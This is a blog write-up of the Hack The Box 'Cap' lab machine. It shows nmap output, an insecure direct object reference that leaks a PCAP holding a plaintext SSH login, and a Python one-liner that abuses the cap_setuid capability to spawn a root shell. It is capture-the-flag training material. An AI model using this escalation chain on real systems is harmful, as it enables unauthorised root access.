IT and security stuff

HTB – Cap Writeup

neoh 
 neoh  main  ~/HTB/cap  sudo nmap 10.10.10.245 -sSCV -p- -T4 -oN nmap.md
[sudo] password for neoh: 
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 16:03 EST
Nmap scan report for 10.10.10.245
Host is up (0.026s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
| fingerprint-strings: 
[...]
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.57 seconds

Nmap reveals FTP, SSH and HTTP. I couldn’t log successfully on FTP so went to the website.

The website reveals some sort of security web app.
We can download a PCAP file.

The pcap had nothing really interesting. Going back to the website and looking at the URL http://10.10.10.245/data/1 I wondered what was at /data/0. It seems like an older report. I downloaded it.

I could see an SSH authentication which was in plain text, lol.
 neoh  main  ~/HTB/validation  ssh [email protected]
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.
ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.245' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Nov 14 21:13:58 UTC 2021

  System load:  0.19              Processes:             255
  Usage of /:   36.6% of 8.73GB   Users logged in:       0
  Memory usage: 20%               IPv4 address for eth0: 10.10.10.245
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
[email protected]:~$ sudo -l
[sudo] password for nathan: 
Sorry, user nathan may not run sudo on cap.

After a couple minutes of enumeration, I found out something nice.

[email protected]:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
[email protected]:~$ python -c 'import os; os.setuid(0); os.system("/bin/sh")'

We can use python to gain capabilities with suid.

[email protected]:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# whoami
root

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.